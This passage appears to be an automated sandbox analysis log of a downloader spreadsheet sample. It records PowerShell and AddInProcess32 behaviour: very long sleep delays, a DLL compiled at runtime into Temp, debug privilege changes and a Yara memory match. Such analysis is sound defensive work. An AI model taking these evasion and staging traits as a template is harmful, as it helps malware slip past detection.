                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsxStream path 'Workbook' entropy: 7.97464838211 (max. 8.0)
                Source: 09230000.0.drStream path 'Workbook' entropy: 7.97470108181 (max. 8.0)
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1293Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7439Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6062Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2198Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2212Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 598Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1591Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8259Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.dllJump to dropped file
                Source: C:\Windows\System32\mshta.exe TID: 3892Thread sleep time: -420000s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3100Thread sleep time: -180000s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3308Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4084Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3180Thread sleep count: 6062 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3200Thread sleep count: 2198 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3264Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3260Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3152Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1208Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 724Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2180Thread sleep count: 1591 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2180Thread sleep count: 8259 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3520Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1468Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1468Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 3004Thread sleep time: -180000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 16_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,16_2_00403D74
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 60000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 16_2_0040317B mov eax, dword ptr fs:[00000030h]16_2_0040317B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 16_2_00402B7C GetProcessHeap,RtlAllocateHeap,16_2_00402B7C
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess token adjusted: DebugJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1224, type: MEMORYSTR
